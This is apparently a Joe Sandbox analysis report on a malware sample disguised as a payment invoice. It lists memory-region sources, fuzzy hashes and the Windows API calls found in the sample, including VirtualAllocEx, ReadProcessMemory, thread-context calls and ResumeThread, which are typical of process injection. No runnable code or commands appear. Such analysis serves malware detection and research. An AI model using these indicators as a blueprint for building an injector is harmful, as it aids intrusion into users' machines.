                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: 851ea2521f9413a7470cab64a927bae6637162a24acb6fc7b75625e17ba04890
                                                                                              • Instruction ID: 45ff0cec19f26155d841530293cc4fcb55d10ba0449a39de6ba7ea3bff61b4af
                                                                                              • Opcode Fuzzy Hash: 851ea2521f9413a7470cab64a927bae6637162a24acb6fc7b75625e17ba04890
                                                                                              • Instruction Fuzzy Hash: EC2135719002098FDB10DFAAC885BAEBBF5EF98324F14842ED519A7341CB789944CFA0
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 098DE738
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: bfabb792a45d5744a2b19af1059466c4777fdb33b43ca899accc195e9f8834c0
                                                                                              • Instruction ID: 9c9c14bb15562ec1af0021f655ad448da871cc66300493240505f3aa66a5a077
                                                                                              • Opcode Fuzzy Hash: bfabb792a45d5744a2b19af1059466c4777fdb33b43ca899accc195e9f8834c0
                                                                                              • Instruction Fuzzy Hash: ED212871C002499FCB10DFAAC885AEEBBF5FF48320F54842EE919A7251CB349944DBA0
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0149D6A7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 2199ddfbb9461387b8b81f123a0526b6ef45ed52ae8d68965e70b34bd2d6d2a9
                                                                                              • Instruction ID: 85b0b00ac292633a3782ff50a1ea5b7ecd673946f3811e27a6bfb767b48ebfef
                                                                                              • Opcode Fuzzy Hash: 2199ddfbb9461387b8b81f123a0526b6ef45ed52ae8d68965e70b34bd2d6d2a9
                                                                                              • Instruction Fuzzy Hash: D821E4B5D002499FDB10CF9AD984ADEBFF8EB48310F14801AE918A3310C374A940DFA4
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 098DE576
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: ef4c57329c8b54a88f03d89c8d1d9c7f24f931fd21e30b732ab7f857afa77736
                                                                                              • Instruction ID: d67998cef60873d3d42c82f1f76389e44aefed8e60c4950b9b9a74fc3e57454e
                                                                                              • Opcode Fuzzy Hash: ef4c57329c8b54a88f03d89c8d1d9c7f24f931fd21e30b732ab7f857afa77736
                                                                                              • Instruction Fuzzy Hash: 58116772800249DFDB20DFA9D884AEFBFF5EF88320F14841AE519A7250CB359940DFA1
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 098DE576
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 31786bbfe38ce9696bd250d3130e166cb760131156b2555ab7ec16c630ac3d3d
                                                                                              • Instruction ID: ba3d015838bbe93103e7fce04ce1757048a8ee31da7285c6e7b08bc0ebb0fd10
                                                                                              • Opcode Fuzzy Hash: 31786bbfe38ce9696bd250d3130e166cb760131156b2555ab7ec16c630ac3d3d
                                                                                              • Instruction Fuzzy Hash: C61149729002499FDB10DFAAC884ADFBFF5EF88320F14841AE519A7250CB759944DFA0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: f57e10f2d72a7b863465d895d28bed9c585fb91172ef705d3318781394f75854
                                                                                              • Instruction ID: 203e6f551127747f344227a4df90280a9dd48504b5da6df5d24a1e4e45d1bcc4
                                                                                              • Opcode Fuzzy Hash: f57e10f2d72a7b863465d895d28bed9c585fb91172ef705d3318781394f75854
                                                                                              • Instruction Fuzzy Hash: 081134B19002498FDB20DFAAC8847AEFFF5EF89324F24841AD419A7241CB355945CBA4
                                                                                              APIs
                                                                                              • OutputDebugStringW.KERNELBASE(00000000), ref: 098D4128
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: DebugOutputString
                                                                                              • String ID:
                                                                                              • API String ID: 1166629820-0
                                                                                              • Opcode ID: fd023754c9cb783a12d2e6bd6729df3ed4f0b983562c7c1fc269bc366adfc585
                                                                                              • Instruction ID: cab021bcf21571888e7a6d631e6a0737e10e4e24fc01be95076b20ab2cbcc703
                                                                                              • Opcode Fuzzy Hash: fd023754c9cb783a12d2e6bd6729df3ed4f0b983562c7c1fc269bc366adfc585
                                                                                              • Instruction Fuzzy Hash: F01104B5C0465A9BCB14CF9AD944A9EFBF4FB58720F10811AD818A3350D774A944CFA5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: 21f5e421c4e18d5ed9725b75b449badc3a43db17a91f40749f22bd7310730f38
                                                                                              • Instruction ID: 2135c81ab180f1b9b646142aad8bdda582230c6eb47c06b2f89ee9cb3c820f83
                                                                                              • Opcode Fuzzy Hash: 21f5e421c4e18d5ed9725b75b449badc3a43db17a91f40749f22bd7310730f38
                                                                                              • Instruction Fuzzy Hash: 32113A71D002498FDB20DFAAC88579EFBF5EF88320F14841DD519A7240CB756944CBA4
                                                                                              APIs
                                                                                              • OutputDebugStringW.KERNELBASE(00000000), ref: 098D4128
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: DebugOutputString
                                                                                              • String ID:
                                                                                              • API String ID: 1166629820-0
                                                                                              • Opcode ID: 613af40608bb2888b49adf962d8df6db221520656f6f46d5ddad3c375dd6edbe
                                                                                              • Instruction ID: d0d3187410f27b83176477aa1417f1be71344102438caab3950e2464d1df3426
                                                                                              • Opcode Fuzzy Hash: 613af40608bb2888b49adf962d8df6db221520656f6f46d5ddad3c375dd6edbe
                                                                                              • Instruction Fuzzy Hash: B91123B5C0465A9BCB14CF9AD984A9EFBB4FB58320F10811AE818B7350D734A544CFA1
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 018214F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197381325.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 81b44ddac4775bc5f581fe623400ef673637d82af6a2735d458bfe6256f443a2
                                                                                              • Instruction ID: ee7fbeaeb024e25100ce4703ee97d97638c7eebf9f6409e9a32b316d150304fa
                                                                                              • Opcode Fuzzy Hash: 81b44ddac4775bc5f581fe623400ef673637d82af6a2735d458bfe6256f443a2
                                                                                              • Instruction Fuzzy Hash: 671128B5800349DFDB10CF99C884BDEBFF8EB49324F24845AD558A7250C3756544CFA0
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0149AF9E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197060825.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1490000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 27b741d997c1fff4e14ae26430a5a8780fe31751ccc5dc1c2724615aed8727ba
                                                                                              • Instruction ID: 1b064d28fb06409bd0016b0f93cb9396074a9ab5ef8233cc1a9610363b93497e
                                                                                              • Opcode Fuzzy Hash: 27b741d997c1fff4e14ae26430a5a8780fe31751ccc5dc1c2724615aed8727ba
                                                                                              • Instruction Fuzzy Hash: 5F11E0B6C002498FDB10CF9AD944ADEFBF4EB88324F24841AD929A7254D379A545CFA1
                                                                                              APIs
                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 018214F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197381325.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessagePost
                                                                                              • String ID:
                                                                                              • API String ID: 410705778-0
                                                                                              • Opcode ID: 74072f9186ea106a1702f43756e4b6ea48ffce12b8e45d5f6c78df6e2761428f
                                                                                              • Instruction ID: 5fd14bb979006b751835ebb10ad5ae0c05d7ff9f18a694950f66896cfb340a1a
                                                                                              • Opcode Fuzzy Hash: 74072f9186ea106a1702f43756e4b6ea48ffce12b8e45d5f6c78df6e2761428f
                                                                                              • Instruction Fuzzy Hash: CA11D6B5800349DFDB10CF99C989BDEBBF8EB48710F148459D518A7250C375A544CFA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @
                                                                                              • API String ID: 0-2766056989
                                                                                              • Opcode ID: 125908e63cd1b717ad23905a316622405a7d08a78f8f7dedc8ec8cb81577ee1e
                                                                                              • Instruction ID: e7cd694a1a0003defe2526cec52107504b4ff4a2fa25fd39744f48c4ed787059
                                                                                              • Opcode Fuzzy Hash: 125908e63cd1b717ad23905a316622405a7d08a78f8f7dedc8ec8cb81577ee1e
                                                                                              • Instruction Fuzzy Hash: 54D11B7590020ACFCF05DFA8C4959EDB7B1FF48314B258659D816AB259DB70AE8ACFC0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: 10e2e784bec3a3449616b79f056cb42dd23f8d035979f66a6d5f3b7a1898e8f3
                                                                                              • Instruction ID: 6055cf1d5444014522140c722609ca4fdfc5f763973ae07ed0ad13630ee9f9fa
                                                                                              • Opcode Fuzzy Hash: 10e2e784bec3a3449616b79f056cb42dd23f8d035979f66a6d5f3b7a1898e8f3
                                                                                              • Instruction Fuzzy Hash: 5FB13E7590024ACFCF05DFA8C4958DDB7B1FF48314B258699D856AB259DB30EE8ACF80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hiq
                                                                                              • API String ID: 0-3823623015
                                                                                              • Opcode ID: 4e2118e3c88f026bd7a161a44ecbd9bb7b5da98d2cf3237716dc23344f2bde9b
                                                                                              • Instruction ID: 243dc81c9466dd8845dea18f28926dd43e71f331c99c115bba0d3c62df007bc5
                                                                                              • Opcode Fuzzy Hash: 4e2118e3c88f026bd7a161a44ecbd9bb7b5da98d2cf3237716dc23344f2bde9b
                                                                                              • Instruction Fuzzy Hash: 66618075A002158FCB14DFA4C8949AEBBF2FF89700B1484AADA05DB365DB35ED46CBD0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (iq
                                                                                              • API String ID: 0-3943945277
                                                                                              • Opcode ID: a30a86769711adb6eb44d0050f3dc4253a67a2ed4b6843d22e3d1f3b773ac363
                                                                                              • Instruction ID: b57ecd7d1e868b460e9de3effa34e58497fa7b1af3e8432e4be93f1283ce3d02
                                                                                              • Opcode Fuzzy Hash: a30a86769711adb6eb44d0050f3dc4253a67a2ed4b6843d22e3d1f3b773ac363
                                                                                              • Instruction Fuzzy Hash: 6141257570A2A04FCB19AB7D946413D3BA3AFCA65071845AEC846CF3A5DF30DD0287D6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hiq
                                                                                              • API String ID: 0-3823623015
                                                                                              • Opcode ID: 867f04fb00809a89d5bd42bf86cbedb117ea3042e6dc48c395389ca309ed467e
                                                                                              • Instruction ID: 8fa34513260dc72edc809f5d6f691b8ca6e7e601c5d81267fb8058f516e7d583
                                                                                              • Opcode Fuzzy Hash: 867f04fb00809a89d5bd42bf86cbedb117ea3042e6dc48c395389ca309ed467e
                                                                                              • Instruction Fuzzy Hash: A74151B5A002089FCB14DFA9D445A9EBBF5FF88310F14886ED849E7351DB34AD45CBA1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hiq
                                                                                              • API String ID: 0-3823623015
                                                                                              • Opcode ID: ff19f79e0ad7e2780825c5d1a3640b6049550eb761791440b9c97e7778b8b737
                                                                                              • Instruction ID: 556477871eb4f01d9fa89101331e37fe594ceb0777b8318ef4313702c38c9af6
                                                                                              • Opcode Fuzzy Hash: ff19f79e0ad7e2780825c5d1a3640b6049550eb761791440b9c97e7778b8b737
                                                                                              • Instruction Fuzzy Hash: 0221E474A051459FC716AF69D8649AEBFB6FFC5340B19C0AAD908CB3A6CE348C05C791
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hiq
                                                                                              • API String ID: 0-3823623015
                                                                                              • Opcode ID: 1d6ac270b674627f17ad4ccb3850a0f75122258dc8e181e556216e5a6d2e6527
                                                                                              • Instruction ID: 3ed8e0320d72748fa28a74136dae0e07738b1bdc02e409fe0cf2aa9e4e3b1c36
                                                                                              • Opcode Fuzzy Hash: 1d6ac270b674627f17ad4ccb3850a0f75122258dc8e181e556216e5a6d2e6527
                                                                                              • Instruction Fuzzy Hash: AF21D370A001049FDB05EFB9D4596AE7BF6FF89310F1849AAE402AB388DB719C00CB91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: W
                                                                                              • API String ID: 0-655174618
                                                                                              • Opcode ID: 7f27fef7ff104601b004537a36acffac332fedbb4d69553c509792f48ecbafa5
                                                                                              • Instruction ID: da81c49e704e17c6ff4f2c316f51cc25fb8c97870ff90880fa4d8b70f7b69626
                                                                                              • Opcode Fuzzy Hash: 7f27fef7ff104601b004537a36acffac332fedbb4d69553c509792f48ecbafa5
                                                                                              • Instruction Fuzzy Hash: 593155359047499FCF01EFA8C8849DDBBB1FF89300F55869DD5456B221EB30E589CB41
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (iq
                                                                                              • API String ID: 0-3943945277
                                                                                              • Opcode ID: c6b6df23b278a2d9346faf0ac6bd3707401fae3f52e8316b1cdd69992e05f127
                                                                                              • Instruction ID: 98fcd5328a8eaf7bd970520869dd6931835b4cbccbf69ce41b0c3fb65753a321
                                                                                              • Opcode Fuzzy Hash: c6b6df23b278a2d9346faf0ac6bd3707401fae3f52e8316b1cdd69992e05f127
                                                                                              • Instruction Fuzzy Hash: A60149743092848FD3199BA8D45462EBBE6FFC6300F298CAFD845CB281DA309C05C7A2
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 098D41C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: 14db4522dfd527b67999db6adeb9101243fd404932f608ebf1fac626d49e00c9
                                                                                              • Instruction ID: b76f893b7441277fc70e403f15128ba1b0b18c9b61e37888a4869634e5bd61a0
                                                                                              • Opcode Fuzzy Hash: 14db4522dfd527b67999db6adeb9101243fd404932f608ebf1fac626d49e00c9
                                                                                              • Instruction Fuzzy Hash: F61134B1800249CFDB10CFAAD885BEEBBF4EB58314F20845AD518A3261C734A944CFA0
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 098D41C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: fd335d2b18d47667ec34dd96cae6c51b49764f49d5468a55ad197648b6c81e34
                                                                                              • Instruction ID: eafe23fc9e1d116607a2a092b5749f6783fe7c31a976fd95c18dce7966d77c5f
                                                                                              • Opcode Fuzzy Hash: fd335d2b18d47667ec34dd96cae6c51b49764f49d5468a55ad197648b6c81e34
                                                                                              • Instruction Fuzzy Hash: 8B1128B1804249CFDB10DF9AC845BDEFBF8EB58324F108459D518A3351D774A944CFA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'eq
                                                                                              • API String ID: 0-1552367303
                                                                                              • Opcode ID: cc1b434809bfa1e92bf6f7841758e6f545820dbd6b1a3f840b9ec637b18634ab
                                                                                              • Instruction ID: c0804429e3ff512eecf809b06726e7ade3d823f64f4b979ec893b60d493ea164
                                                                                              • Opcode Fuzzy Hash: cc1b434809bfa1e92bf6f7841758e6f545820dbd6b1a3f840b9ec637b18634ab
                                                                                              • Instruction Fuzzy Hash: 6F0126363051408FCB06CB78E9696293FE2FFCA21070904F9E886CB366DE34EC008750
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'eq
                                                                                              • API String ID: 0-1552367303
                                                                                              • Opcode ID: 821f6fb86cec0ac12772f483b530d8b07e4f6785df3397c29db3cda679a4af8a
                                                                                              • Instruction ID: 56e6acdfb5ad4dd818925481b7fba1e22e0ec61920847eab16a967e2f213f44e
                                                                                              • Opcode Fuzzy Hash: 821f6fb86cec0ac12772f483b530d8b07e4f6785df3397c29db3cda679a4af8a
                                                                                              • Instruction Fuzzy Hash: DC01DFB0611285CFCB06DF78E55849CBFB0FFA621071005EAE8419F2A6DE303D05C701
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'eq
                                                                                              • API String ID: 0-1552367303
                                                                                              • Opcode ID: 53ba234709d641485bb4a880b89d1a7b9c7bea24910e931b946a26a28dfb0821
                                                                                              • Instruction ID: 54ba47793c848cb0e2ed7d8b4a0d75c418608fdbcde7cb33d7ef40bb09c72127
                                                                                              • Opcode Fuzzy Hash: 53ba234709d641485bb4a880b89d1a7b9c7bea24910e931b946a26a28dfb0821
                                                                                              • Instruction Fuzzy Hash: 02F04FB0A11209EFCB44EFB8E55959DBFB1FF98201B5005A9E805AB355EE303E48DB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 83c3277ca8d0f79c4a780e8d071a40028dcbdbbc6a5c7855b3d25ddd9ecac931
                                                                                              • Instruction ID: 75e673a9a3d9016b6e1d2ad71b24b0a845135f3c34d57a96f53034f64bbef68a
                                                                                              • Opcode Fuzzy Hash: 83c3277ca8d0f79c4a780e8d071a40028dcbdbbc6a5c7855b3d25ddd9ecac931
                                                                                              • Instruction Fuzzy Hash: 9B725231910609CFCB15EF68C8996ADB7B1FF45301F118699D549AB265EF30AEC9CF80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 424cbd164debc2c9db04a0df0886c76b3b929d0930137f361b63c18ce0117d19
                                                                                              • Instruction ID: f75db370f7c550614091d5fa0d4e30fc0d6c72f76fdcf9c8c46cb1a8f173c119
                                                                                              • Opcode Fuzzy Hash: 424cbd164debc2c9db04a0df0886c76b3b929d0930137f361b63c18ce0117d19
                                                                                              • Instruction Fuzzy Hash: 7142D931E107198BCB15DF68C8856EDB7B1FF89304F118699E859BB251EB70AE85CF80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3f323a55b98c6268a0ddfddb8729202a7d95a9fdd53c19f02e4cb524c7bb5c73
                                                                                              • Instruction ID: fd4d031267fce562791bd02634cb4e4060e2ee78f4db969b31c4ae9304ae8c82
                                                                                              • Opcode Fuzzy Hash: 3f323a55b98c6268a0ddfddb8729202a7d95a9fdd53c19f02e4cb524c7bb5c73
                                                                                              • Instruction Fuzzy Hash: 42223A34A10215CFCB14DF69C895AADB7B2FF88304F5485A9E806EB365DB70AD85CF90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d893e547f71611db0f6c4fe4918faee71afe153433f15af77d97df0f378e7e5c
                                                                                              • Instruction ID: b4ef727de549882de6fb445cb32f9de03fd1369212e0ef6e44394a8df6c93d0c
                                                                                              • Opcode Fuzzy Hash: d893e547f71611db0f6c4fe4918faee71afe153433f15af77d97df0f378e7e5c
                                                                                              • Instruction Fuzzy Hash: 58E1EB31E116198FCB15DF68C8956EDB7B2FF49304F108699D819EB251EB70AE85CF80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2203219999.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_5830000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5d3dd5aa3a2dc34fde706419e57d3f60b4da7c225022c2a9709ebabbf4b8735f
                                                                                              • Instruction ID: 308d406898e1a0c3270ff2fc8f70f8d9e5ae75e8c61898bc9d1597c6431148cd
                                                                                              • Opcode Fuzzy Hash: 5d3dd5aa3a2dc34fde706419e57d3f60b4da7c225022c2a9709ebabbf4b8735f
